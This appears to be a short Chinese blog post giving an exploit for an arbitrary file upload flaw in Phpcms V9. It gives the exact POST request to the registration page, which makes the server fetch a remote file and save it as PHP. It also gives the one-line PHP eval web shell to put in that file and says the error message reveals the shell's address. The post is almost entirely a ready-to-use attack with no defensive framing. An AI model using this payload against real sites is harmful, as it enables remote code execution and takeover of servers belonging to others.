Phpcms_V9任意文件上传

Phpcms_V9任意文件上传

下载最新版Phpcms,在注册页面进行post提交。regEXP:

siteid=1&modelid=11&username=123456&password=123456&email=123456@qq.com&info[content]=<img src=http://127.0.0.1/2.txt?.php#.jpg>&dosubmit=1&protocol=

2.txt中写入一句话:

<?php @eval($_POST[cmd]);?>

exp
报错,并返回shell地址。
errorgetshell。
shell

posted on 2017-04-10 18:01  起个名咋就这么难  阅读(145)  评论(0编辑  收藏  举报

导航